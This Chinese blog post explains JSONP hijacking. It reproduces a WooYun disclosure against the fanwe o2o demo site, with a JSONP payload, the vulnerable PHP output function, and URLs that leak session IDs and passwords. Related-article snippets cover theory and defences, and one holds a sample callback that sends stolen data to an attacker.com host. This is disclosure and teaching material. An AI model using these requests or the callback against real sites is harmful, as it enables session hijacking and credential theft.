jsonp劫持

最新推荐文章于 2025-06-14 23:37:31 发布
原创 最新推荐文章于 2025-06-14 23:37:31 发布 · 3.5k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#jsonp劫持

基础:

说说JSON和JSONP,也许你会豁然开朗,含jQuery用例    

JSONP 安全攻防技术

【技术分享】JSONP注入实战指南 

案例:

payload:

$.ajax({type:"get",url:"http://o2odemo.fanwe.net/mapi/index.php?ctl=synclogin&act=index&login_type=Sina&sina_id=ooooo&access_token=ooooo&r_type=3&callback=wooyun",dataType:"jsonp",jsonp:"callback",success:function(json){console.log(json);}});

wooyun-2015-0124949

/mapi/Lib/core/common.php中有 fanwe o2o的output函数:

/**
 * 输出接口数据
 * @param unknown_type $data 返回的接口数据
 * @param unknown_type $status 当前状态 0/1
 * @param unknown_type $info 当前消息 可选,为空时由客户端取默认提示(默认提示包含成功的默认提示与失败的默认提示)
 */
function output($data,$status=1,$info="")
{
	header("Content-Type:text/html; charset=utf-8");
	$r_type = intval($_REQUEST['r_type']);//返回数据格式类型; 0:base64;1;json_encode;2:array 3:jsonp
	$data[CTL] = MODULE_NAME;
	$data[ACT] = ACTION_NAME;
	$data['status'] = $status;
	$data['info'] = $info;
	$data['city_name'] = $GLOBALS['city']['name'];
	$data['return'] = 1; //弃用该返回,统一返回1
	$data['sess_id'] = $GLOBALS['sess_id'];
	if ($r_type == 0)
	{
		echo base64_encode(json_encode($data));
	}
	else if ($r_type == 1)
	{
        echo(json_encode($data));
	}
	else if ($r_type == 2)
	{
		print_r($data);
	}
	else if($r_type == 3)
	{
		$json = json_encode($data);
		echo $_GET['callback']."(".$json.")";
	}
	exit;
}


这是一个通用的输出函数,所有/mpai下的输出全部由output输出。
我们可以看到,这里当$_REQUEST['r_type']==3的时候,输出格式为jsonp。
所以,如果$data中有敏感信息,即会造成jsonp劫持。
结果当前函数中就存在一个敏感信息:sess_id
$data['sess_id'] = $GLOBALS['sess_id'];
用户登陆后(fanwe o2o 默认用户账号密码都是fanwe,以这个用户为例),可劫持用户的session(http://o2odemo.fanwe.net/mapi/index.php?ctl=syncbind&act=index&login_type=Sina&access_token=ooooo&sina_id=ooooo&r_type=3&callback=wooyun):

QQ20150706-14@2x.png


继续深挖,刚才访问的这个URL(http://o2odemo.fanwe.net/mapi/index.php?ctl=syncbind&act=index&login_type=Sina&access_token=ooooo&sina_id=ooooo&r_type=3&callback=wooyun),实际上就是将账户fanwe绑定了sina_id为ooooo。
那么另外一处,我们可以直接用ooooo进行登录:
http://o2odemo.fanwe.net/mapi/index.php?ctl=synclogin&act=index&login_type=Sina&sina_id=ooooo&access_token=ooooo&r_type=3&callback=wooyun

QQ20150706-15@2x.png


如上图,可以直接劫持用户密码。
写了个POC证明问题。受害者登录http://o2odemo.fanwe.net,再访问该POC即会弹出他的账号、邮箱、密码:
http://mhz.pw/game/tx/fanweo2o.html

QQ20150706-16@2x.png

漏洞证明:

http://mhz.pw/game/tx/fanweo2o.html

QQ20150706-16@2x.png


JSON与JSONP劫持原理
渗透之路,攻防之间皆学问
08-01 5449
目录 JSON劫持 JSONP劫持 JSONP劫持漏洞实例 JSONP接口漏洞挖掘 漏洞危害 漏洞防御 JSON劫持 json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。 一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。 比如下面的链接在已登录的情况下
【网络安全】JSONP劫持原理及攻击实战
等风来
10-13 2026
JSONPJavaScriptObjectNotationPadding)是一种用于绕过浏览器同源策略限制的技术,使得网页可以从不同域名的服务器请求数据。由于浏览器的同源策略限制,网页通常只能向与其同源的服务器发送请求。然而,标签不受同源策略的限制,可以从任何域加载和执行脚本。JSONP 利用这一特性,通过动态添加标签来实现跨域数据请求。
详解JSON和JSONP劫持以及解决方法
10-17
主要介绍了详解JSON和JSONP劫持以及解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
JSON劫持攻击
QQ_346127357的博客
05-09 723
JSON 劫持又为“ JSON Hijacking ”,最开始提出这个概念大概是在 2008 年国外有安全研究人员提到这个 JSONP 带来的风险。其实这个问题属于 CSRF( Cross-site request forgery 跨站请求伪造)攻击范畴。当某网站听过 JSONP 的方式来快域(一般为子域)传递用户认证后的敏感信息时,攻击者可以构造恶意的 JSONP 调用页面,诱导被攻击者访问来达到截取用户敏感信息的目的。 漏洞原理 JSON实际应用的时候会有两种传输数据的方式: xmlhttp获取数
Jsonp劫持
Sentiment的博客
07-25 1228
我们知道,在JSONP跨域中,我们是可以传入一个函数名的参数如callback,然后JSONP端点会根据我们的传参动态生成JSONP数据响应回来。如果JSONP端点对于用于传入的函数名参数callback处理不当,如未正确设置响应包的Content-Type、未对用户输入参数进行有效过滤或转义时,就会导致XSS漏洞的产生。jsonp.php} else {请求后触发xss,此时发现php默认的content-type为text/html。
jsonp劫持攻击
goddemon
03-10 550
前言: 对这个漏洞一直是知道是什么东西,但是一直不太懂这个漏洞该咋挖和咋进阶利用 今天上课的时候查漏补缺研究了下这个东西做了一个总结 漏洞原理: 核心利用的原理:JSONP技术可以实现数据的跨域访问,进而攻击者利用该漏洞可以向用户发送一个伪造的链接,进而当用户点击后进行回调函数进而即窃取到用户的信息 典型可以跨域的标签 < script src = "..." > </script> <img src="..."> <video src="..."><
详解JSON和JSONP劫持以及解决方法.docx
01-22
"详解JSON和JSONP劫持以及解决方法" 本文主要介绍了JSON和JSONP劫持的概念、攻击过程、解决方法以及实例代码,旨在帮助读者深入理解这两种攻击方式,并提供实际有效的解决方法。 JSON劫持 JSON劫持,也称为JSON ...
JSONP劫持
BinParker的博客
08-10 279
JSONP(JSON with Padding)是JSON的一种“使用模式”,可用于解决主流浏览器的跨域数据访问的问题。由于同源策略,协议+IP+端口有任意不同都会导致请求跨域,而 HTML 的 元素是一个例外。利用 元素的这个开放策略,网页可以得到从其他来源动态产生的 JSON 资料。
CSRF扩展 JSONP劫持
最新发布
2401_89464052的博客
06-14 1042
摘要:JSONP劫持是一种利用JSONP跨域机制的安全漏洞,攻击者通过篡改回调函数窃取用户数据。该漏洞源于浏览器默认允许跨域加载JS脚本,而无需服务器端限制。文中通过DVWA靶场演示,展示了如何利用XSS漏洞构造恶意JS代码,通过JSONP回调参数执行非预期操作(如弹窗)。防御建议包括输入验证、CSRF防护及迁移至更安全的CORS技术,同时强调开发者需定期审计第三方脚本。(150字)
【Web安全】JSONP劫持
不忘初心,护天下安全!
02-10 750
一、JSONP为何物 JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 <script></script> 元素标签,远程调用 JSON 文件来实现数据传递。 细致的介绍可以看这:https://blog.youkuaiyun.com/hansexploration/arti...
web前端安全性——JSONP劫持
qq_53911056的博客
02-22 1933
JSONP劫持的防护 (1)限制referer 前端可以通过设置document.referrer属性来限制Referer。虽然这并不能阻止攻击者伪造Referer,但可以增加一层防护。 (2)使用token 在前端,你可以通过添加一个自定义的token参数来增强JSONP请求的安全性。
JSONP 劫持
weixin_38885346的博客
05-02 500
一、什么是JSONP JSONP(Json in Paddig) 第一、在网络中为了传输数据与读取数据有统一的格式,所以使用json结构来重构数据,简单点就是键值对; 第二、由于同源策略,所以不同域的网站无法通过AJAX直接读取数据,比如一个银行,有两个不同域的网站,一个网站可以以json格式显示用户信息,银行希望另一个网站能够读取到这些信息; 第三、虽然不能跨域请求,但是能跨域脚本包含 基于此,JSONP诞生了,其实JSONP的实现原理就是JSONP劫持的实现原理,用个靶场举例: 二、实现原理 目标网
谈谈跨域 & JSONP & JSONP劫持 安全问题
无聊的曹操的博客
05-07 778
今天一起来看下 JSONP 相关的知识和安全性。 JSONP: 我们开发时可能会有一些接口,前端向后端发送 XMLHTTPRequest ,后端返回 JSON 数据或其他以供前端展示 : 但是由于 浏览器的同源策略 ,在浏览器层面禁止跨域访问读取数据。 比如你是 A 域网站的用户 张三,前端想向 B 域读取你的信息时,则无法通过浏览器的 同源策略。 但是如果向...
jsonp劫持利用
03-29
### JSONP 劫持的原理 JSONP(JSON with Padding)是一种通过 `<script>` 标签绕过浏览器同源策略的技术。它的核心机制在于利用了 `<script>` 标签可以加载跨域资源的能力,而这种能力不受同源政策限制。然而,由于 JSONP 的设计缺陷,可能导致安全风险。 #### 原理分析 JSONP 请求通常由服务器返回一段 JavaScript 代码,这段代码会被客户端动态执行。假设存在一个支持 JSONP 的接口 `http://example.com/api?callback=foo`,该接口会返回如下形式的数据: ```javascript foo({"key": "value"}); ``` 这里的 `foo` 是客户端指定的一个函数名,用于处理返回的结果。如果攻击者能够控制回调函数的内容或者用户的访问环境,则可能引发安全性问题。 具体来说,JSONP 劫持主要依赖于以下几个条件: 1. **目标网站提供 JSONP 支持**:即允许用户自定义 callback 参数。 2. **受害者登录状态可被利用**:例如,攻击者能获取到受害者的 Cookie 或其他认证信息。 3. **恶意脚本注入**:攻击者可以在第三方页面中嵌入 `<script>` 标签指向目标 API 地址,并设置自己的回调函数名称。 一旦上述条件满足,攻击者就可以通过构造合适的 URL 和回调函数窃取敏感数据[^1]。 --- ### 利用方式 以下是典型的 JSONP 劫持过程描述: 1. **准备阶段** - 攻击者创建一个网页,在其中加入以下 HTML 片段: ```html <script> function maliciousCallback(data) { alert('Stolen data: ' + JSON.stringify(data)); // 将盗取的信息发送至远程服务器 var img = new Image(); img.src = "http://attacker.com/log?" + encodeURIComponent(JSON.stringify(data)); } </script> <script src="http://vulnerable-site.com/api?callback=maliciousCallback"></script> ``` 2. **触发阶段** - 当用户访问此恶意网页时,浏览器会向 `http://vulnerable-site.com/api?callback=maliciousCallback` 发起请求。 - 如果用户已登录到 `vulnerable-site.com` 并携带有效 Session ID (Cookie),那么响应将包含受保护的数据。 3. **后果** - 返回的数据会被传递给 `maliciousCallback()` 函数并被执行。 - 此过程中,敏感信息可能会泄露给攻击者。 需要注意的是,现代 Web 应用已经逐渐淘汰了纯 JSONP 方案,转而使用 CORS 来解决跨域资源共享需求,从而减少此类安全隐患的发生概率[^5]。 --- ### 防护措施建议 为了防止 JSONP 被滥用造成危害,可以从多个角度采取防护手段: - 不再对外公开支持任意参数命名的 JSONP 接口; - 对所有 GET 请求实施严格的 CSRF Token 校验; - 使用 HTTPS 加密通信链路以降低中间人攻击的风险; - 教育开发者避免在生产环境中暴露未授权即可调用的服务端点。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值